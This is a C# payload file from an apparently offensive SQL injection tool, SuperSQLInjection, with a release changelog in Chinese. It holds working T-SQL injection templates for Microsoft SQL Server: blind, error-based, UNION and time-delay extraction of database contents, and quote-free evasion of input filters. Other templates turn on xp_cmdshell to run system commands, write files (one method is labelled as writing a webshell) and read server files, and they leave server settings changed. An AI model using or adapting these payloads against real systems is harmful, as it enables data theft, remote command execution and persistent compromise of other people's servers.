SuperSQLInjectionV1/SuperSQLInjection/payload/SQLServer.cs
shack2 b18f7b73f9 update20181221
20181221 V1.0 正式版---
修复盲注关键字判断机制,自动识别时,关键字相同且状态码相同才认为是true页面,解决在部分情况下可能出现错误500页面也存在同样关键字的问题。
修改SQLServer查询列时,使用char函数方式,避免单引号被过滤导致无法获取列名的问题。
修复SQLServer 执行命令,读写文件时,可能由于语句报错而导致读写文件失败的问题,优化提高成功率。
修复between and绕过时,将16进制字符替换了,导致语句错误而无法获取数据的问题。
修复自动识别在某些情况下跳过了错误显示注入检查。
修复Union注入重复发包判断列情况。
修复自动识别注入,在部分情况下无法正确判断数据库类型的问题。
修改爆出注入配置文件,降低漏报。
优化自动识别注入,如果程序判断支持盲注,会自动尝试使用order by去判断页面列数,提高Union注入检查的速度。
新增支持注入PostgreSQL文件读写功能。
2018-12-21 16:08:29 +08:00



using System;
using System.Collections.Generic;
using System.Text;
using tools;
namespace SuperSQLInjection.payload
{
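class SQLServer
{
    // Payload templates for Microsoft SQL Server.
    //
    // Each string is a T-SQL fragment that the injection engine splices into the
    // vulnerable parameter. Placeholders in braces ({dbname}, {table}, {index},
    // {len}, {data}, {path}, {cmd}) are filled by the caller with String.Replace;
    // nothing in this class quotes or escapes substituted text, so the caller
    // must supply values in a form the target accepts (hex literals, char()
    // chains, bracketed identifiers).
    //
    // Operator note: the command-execution and file payloads switch on server
    // options through sp_configure ('show advanced options', 'xp_cmdshell',
    // 'ole automation procedures', 'web assistant procedures') and nothing in
    // this class switches them off again. The helper table/database they create
    // is only removed when the caller sends dropTable or
    // dropWriteFileBackUpTableAndDropDB. These are persistent, auditable changes
    // on the target; revert them when the engagement allows.

    // Relative path of the version/environment probe list, loaded once at type
    // initialisation by the project's FileTool (defined outside this file).
    public static String path = "config/vers/sqlserver.txt";
    public static List<String> vers = FileTool.readFileToList(path);

    // Number of databases on the instance.
    public static String dbs_count = "(select count(*) from [master]..[sysdatabases])";
    // Number of user tables in {dbname}; xtype=0x55 is the hex form of 'U' so no
    // quote character is needed.
    public static String tables_count = "(select count(*) from [{dbname}]..[sysobjects] where xtype=0x55)";
    // Number of columns in {dbname}..{table}. NOTE: this and column_value still
    // embed single quotes around the object_id() argument; a quote-stripping
    // filter breaks them where the other templates (hex/char()) survive.
    public static String columns_count = "(select count(*) from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}'))";
    // Number of rows in {dbname}..{table}.
    public static String data_count = "(select count(*) from [{dbname}]..[{table}])";
    // Name of the {index}-th database (1-based), paged with nested TOP clauses.
    public static String db_value = "(select (select top 1 name from (select top {index} name from [master]..[sysdatabases] order by name) t order by t.name desc))";
    // Name of the table following the first {index} user tables.
    public static String table_value = "(select (select top 1 name from [{dbname}]..[sysobjects] where xtype=0x55 and id not in (select top {index} id from [{dbname}]..[sysobjects] where xtype=0x55)))";
    // Name of the column following the first {index} columns of {dbname}..{table}.
    public static String column_value = "(select (select top 1 name from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}') and colid not in (select top {index} colid from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}'))))";

    // Boolean-blind comparisons of the counts above against {len}.
    public static String bool_db_count = " " + dbs_count + ">{len}";
    public static String bool_tables_count = " " + tables_count + ">{len}";
    public static String bool_columns_count = " " + columns_count + ">{len}";
    public static String bool_datas_count = " " + data_count + ">={len}";

    // Single-character extraction: code point of character {index} of {data}.
    public static String unicode_value = "cast(unicode(substring({data},{index},1)) as varchar(100))";
    public static String nocast_unicode_value = "unicode(substring({data},{index},1))";
    public static String substr = "substring(({data}),{index},1)";
    public static String substr_value = "substring(({data}),{index},{len})";

    // Boolean-blind length and value comparisons.
    public static String bool_length = " len({data})>{len}";
    public static String bool_dataLength = " datalength({data})>{len}";
    public static String bool_value = " {data}>{len}";
    public static String check_li_value = " len({data})<{len}";
    // Boolean-blind character comparison (character {index} of {data} > {len}).
    public static String bool_unicode_value = " (substring({data},{index},1))>{len}";

    // Row {index} (1-based) of [{dbname}]..[{table}]: {data} is the expression to
    // return, {allcolumns} the projected columns, {orderby} the paging key.
    public static String data_value = "(select top 1 {data} from (select top {index} {allcolumns} from [{dbname}]..[{table}] order by {orderby}) t order by {orderby} desc)";
    // UNION-based extraction; {data} is the full column list.
    public static String union_value = " 1=2 union all select {data}";
    // Error-based extraction: the int conversion fails and the ^^!value!^^
    // marker (built from char() so no quotes appear) lands in the error text.
    // The value is truncated to 2000 characters by the cast.
    public static String error_value = " convert(int,(char(94)+char(94)+char(33)+cast({data} as varchar(2000))+char(33)+char(94)+char(94)))=1";

    // Command execution: creates the scratch table ssqlinjection, enables
    // xp_cmdshell via sp_configure (never reverted here) and stores each output
    // line (up to 8000 chars) as a row. {cmd} must already be a T-SQL expression.
    public static String createTableAndExecCmd = " 1=1;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd;select 1 where 1=1 ";
    // Output line {index} of the last command.
    public static String cmdData = "cast((select top 1 data from ssqlinjection where id={index}) as varchar(8000))";
    // Number of output lines.
    public static String cmdDataCount = "(select (select count(*) from ssqlinjection))";
    // Cleanup of the scratch table (also used after readFileByFileSystemobject).
    public static String dropTable = " 1=1;drop table ssqlinjection;select 1 where 1=1 ";
    // Cleanup / setup of the scratch database used by the backup-based file write.
    public static String dropWriteFileBackUpTableAndDropDB = " 1=1;drop table [ssqlinjection]..[data];drop database ssqlinjection;select 1 where 1=1 ";
    public static String createWriteFileBackUpTable = " 1=1;create table [ssqlinjection]..[data] (content image);select 1 where 1=1 ";
    public static String createWriteFileBackUpDB = " 1=1;create database ssqlinjection;select 1 where 1=1 ";

    // File write through OLE automation (sp_OACreate / Scripting.FileSystemObject).
    // Enables 'ole automation procedures' and leaves it on. {data} and {path}
    // are substituted as raw expressions: the caller supplies the quoting/hex.
    public static String witeFileByFileSystemObject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;select 1 where 1=1 ";
    // File write through sp_makewebtask (Web Assistant). Same raw {data}/{path}
    // convention; enables 'web assistant procedures' and leaves it on.
    public static String witeFileBySP_MakeWebTask = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;select 1 where 1=1 ";
    // File write by backing up the scratch database to {path}; the file also
    // contains backup headers and page data, so the payload is not written
    // cleanly. Relies on T-SQL accepting "set @s=... backup database" without a
    // separator between the statements.
    public static String witeFileByBackDataBase = " 1=1;insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;select 1 where 1=1 ";
    // File read through OLE automation into the scratch table ssqlinjection.
    // NOTE: unlike the write templates, {path} is embedded inside single quotes
    // here, so the caller passes an unquoted path and a quote in it breaks the
    // statement. Reads at most 8000 characters of the file.
    public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);select 1 where 1=1 ";
    // Content read by the payload above (no TOP: presumably the table holds one
    // row because dropTable runs in between — verify against the caller).
    public static String file_content = "(select data from ssqlinjection)";

    /// <summary>
    /// Time-based boolean probe: the target sleeps for <paramref name="maxTime"/>
    /// seconds when <paramref name="data"/> is true and answers at once otherwise.
    /// </summary>
    /// <param name="data">Boolean T-SQL expression to evaluate.</param>
    /// <param name="maxTime">Delay in seconds, emitted as the literal '0:0:N'.
    /// Presumably the engine keeps this below 60 — TODO confirm; larger values
    /// do not form a valid hh:mm:ss string.</param>
    /// <returns>The WAITFOR DELAY payload fragment.</returns>
    public static String getBoolDataBySleep(String data, int maxTime)
    {
        return " 1=1 if(" + data + ") waitfor delay '0:0:" + maxTime + "'";
    }

    /// <summary>
    /// UNION payload returning row <paramref name="index"/> of a table, with every
    /// requested column concatenated ($$$-separated) into the visible column.
    /// </summary>
    /// <param name="columnsLen">Number of columns in the original SELECT.</param>
    /// <param name="showIndex">1-based position of the column echoed in the page.</param>
    /// <param name="Fill">Filler expression for every other column.</param>
    /// <param name="dbname">Database name.</param>
    /// <param name="table">Table name.</param>
    /// <param name="columns">Columns to fetch; the first doubles as the ORDER BY key.</param>
    /// <param name="index">1-based row number.</param>
    /// <returns>The UNION ALL SELECT fragment.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="columns"/> is null.</exception>
    /// <exception cref="ArgumentOutOfRangeException"><paramref name="columnsLen"/> is below 1 or <paramref name="columns"/> is empty.</exception>
    public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dbname, String table, List<String> columns, int index)
    {
        String row = buildRowSelect(concatAllColumnsByConcatStr(columns), columns, dbname, table, index);
        return buildUnionSelect(columnsLen, showIndex, Fill, markValue(row, 8000));
    }

    /// <summary>
    /// UNION payload that echoes an arbitrary value expression in the visible column.
    /// </summary>
    /// <param name="columnsLen">Number of columns in the original SELECT.</param>
    /// <param name="showIndex">1-based position of the column echoed in the page.</param>
    /// <param name="Fill">Filler expression for every other column.</param>
    /// <param name="dataPayLoad">Value expression (cast to varchar(8000)).</param>
    /// <returns>The UNION ALL SELECT fragment.</returns>
    /// <exception cref="ArgumentOutOfRangeException"><paramref name="columnsLen"/> is below 1.</exception>
    public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad)
    {
        return buildUnionSelect(columnsLen, showIndex, Fill, markValue(dataPayLoad, 8000));
    }

    /// <summary>
    /// Same as the four-argument <see cref="getUnionDataValue(int,int,string,string)"/>;
    /// kept as a separate entry point for existing command-output callers.
    /// </summary>
    public static String getUnionDataValueByCMD(int columnsLen, int showIndex, String Fill, String dataPayLoad)
    {
        return getUnionDataValue(columnsLen, showIndex, Fill, dataPayLoad);
    }

    /// <summary>
    /// UNION payload for a templated value expression: {dbname}, {table} and
    /// {index} inside <paramref name="dataPayLoad"/> are substituted first and
    /// the result is cast to varchar(5000).
    /// </summary>
    /// <param name="columnsLen">Number of columns in the original SELECT.</param>
    /// <param name="showIndex">1-based position of the column echoed in the page.</param>
    /// <param name="Fill">Filler expression for every other column.</param>
    /// <param name="dataPayLoad">Value template (e.g. table_value).</param>
    /// <param name="dbname">Database name.</param>
    /// <param name="table">Table name.</param>
    /// <param name="index">1-based row number, already formatted.</param>
    /// <returns>The UNION ALL SELECT fragment.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="dataPayLoad"/> is null.</exception>
    /// <exception cref="ArgumentOutOfRangeException"><paramref name="columnsLen"/> is below 1.</exception>
    public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad, String dbname, String table, String index)
    {
        if (dataPayLoad == null)
        {
            throw new ArgumentNullException("dataPayLoad");
        }
        String expr = dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index);
        return buildUnionSelect(columnsLen, showIndex, Fill, markValue(expr, 5000));
    }

    /// <summary>
    /// Error-based payload returning row <paramref name="index"/> of a table with
    /// all requested columns concatenated into the conversion-error message.
    /// </summary>
    /// <param name="dbname">Database name.</param>
    /// <param name="table">Table name.</param>
    /// <param name="index">1-based row number.</param>
    /// <param name="columns">Columns to fetch; the first doubles as the ORDER BY key.</param>
    /// <returns>The convert(int, ...) fragment.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="columns"/> is null.</exception>
    /// <exception cref="ArgumentOutOfRangeException"><paramref name="columns"/> is empty.</exception>
    public static String getErrorDataValue(String dbname, String table, int index, List<String> columns)
    {
        String row = buildRowSelect(concatAllColumnsByConcatStr(columns), columns, dbname, table, index);
        return error_value.Replace("{data}", row);
    }

    /// <summary>
    /// Joins column names with commas for a SELECT list.
    /// </summary>
    /// <param name="columns">Column names; must contain at least one entry.</param>
    /// <returns>"a,b,c" style list.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="columns"/> is null.</exception>
    /// <exception cref="ArgumentOutOfRangeException"><paramref name="columns"/> is empty.</exception>
    public static String concatAllColumns(List<String> columns)
    {
        requireColumns(columns);
        return String.Join(",", columns.ToArray());
    }

    /// <summary>
    /// Builds a single string expression out of several columns: each column is
    /// null-guarded (isnull(col,0x20)), cast to varchar(5000) and the pieces are
    /// joined with "$$$" written as char(36) calls so no quotes are needed.
    /// </summary>
    /// <param name="columns">Column names; must contain at least one entry.</param>
    /// <returns>The concatenation expression.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="columns"/> is null.</exception>
    /// <exception cref="ArgumentOutOfRangeException"><paramref name="columns"/> is empty.</exception>
    public static String concatAllColumnsByConcatStr(List<String> columns)
    {
        requireColumns(columns);
        String[] parts = new String[columns.Count];
        for (int i = 0; i < parts.Length; i++)
        {
            parts[i] = "cast(isnull(" + columns[i] + ",0x20) as varchar(5000))";
        }
        return String.Join("+char(36)+char(36)+char(36)+", parts);
    }

    /// <summary>
    /// Value expression for boolean-blind extraction of one column of one row.
    /// </summary>
    /// <param name="column">Column whose value is extracted (null becomes a space).</param>
    /// <param name="columns">All columns of the table; the first is the ORDER BY key.</param>
    /// <param name="dbName">Database name.</param>
    /// <param name="table">Table name.</param>
    /// <param name="index">1-based row number.</param>
    /// <returns>A data_value subquery yielding the column as varchar.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="columns"/> is null.</exception>
    /// <exception cref="ArgumentOutOfRangeException"><paramref name="columns"/> is empty.</exception>
    public static String getBoolDataPayLoad(String column, List<String> columns, String dbName, String table, int index)
    {
        return buildRowSelect("cast(isnull(" + column + ",0x20) as varchar)", columns, dbName, table, index);
    }

    /// <summary>
    /// Called by reflection: the file operations this backend offers, in the
    /// order the UI lists them. The strings are UI labels and must stay as-is.
    /// </summary>
    /// <returns>Display names of the supported file read/write methods.</returns>
    public static List<String> getShowCanDoFile()
    {
        List<String> list = new List<String>();
        list.Add("SQLServer FileSystemObject写文件");
        list.Add("SQLServer Sp_MakeWebTask写文件");
        list.Add("SQLServer 备份写WebShell(有多余数据)");
        list.Add("SQLServer FileSystemObject读文件");
        return list;
    }

    // Shared argument check: every row/column builder needs at least one column
    // because columns[0] is used as the paging key.
    private static void requireColumns(List<String> columns)
    {
        if (columns == null)
        {
            throw new ArgumentNullException("columns");
        }
        if (columns.Count == 0)
        {
            throw new ArgumentOutOfRangeException("columns", "at least one column is required");
        }
    }

    // Fills data_value: valueExpr is what the row returns, columns[0] the
    // ORDER BY key, and the remaining placeholders come from the arguments.
    // Replacement order matters: {data} and {allcolumns} are expanded before
    // {dbname}/{table}/{index} so the templates inside them are filled too.
    private static String buildRowSelect(String valueExpr, List<String> columns, String dbname, String table, int index)
    {
        requireColumns(columns);
        return data_value
            .Replace("{data}", valueExpr)
            .Replace("{allcolumns}", concatAllColumns(columns))
            .Replace("{orderby}", columns[0])
            .Replace("{dbname}", dbname)
            .Replace("{table}", table)
            .Replace("{index}", index.ToString());
    }

    // Wraps a value expression in the ^^! ... !^^ markers the response parser
    // looks for, spelled as char() calls so the payload carries no quotes, and
    // casts it to varchar(width).
    private static String markValue(String expr, int width)
    {
        return "(char(94)+char(94)+char(33)+cast(" + expr + " as varchar(" + width + "))+char(33)+char(94)+char(94))";
    }

    // Builds the column list of the UNION SELECT: markedExpr at position
    // showIndex, Fill everywhere else. A showIndex outside 1..columnsLen yields
    // a list of fillers only, as before.
    private static String buildUnionSelect(int columnsLen, int showIndex, String Fill, String markedExpr)
    {
        if (columnsLen < 1)
        {
            throw new ArgumentOutOfRangeException("columnsLen", "a UNION payload needs at least one column");
        }
        StringBuilder sb = new StringBuilder();
        for (int i = 1; i <= columnsLen; i++)
        {
            if (i > 1)
            {
                sb.Append(",");
            }
            sb.Append(i == showIndex ? markedExpr : Fill);
        }
        return union_value.Replace("{data}", sb.ToString());
    }
}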
}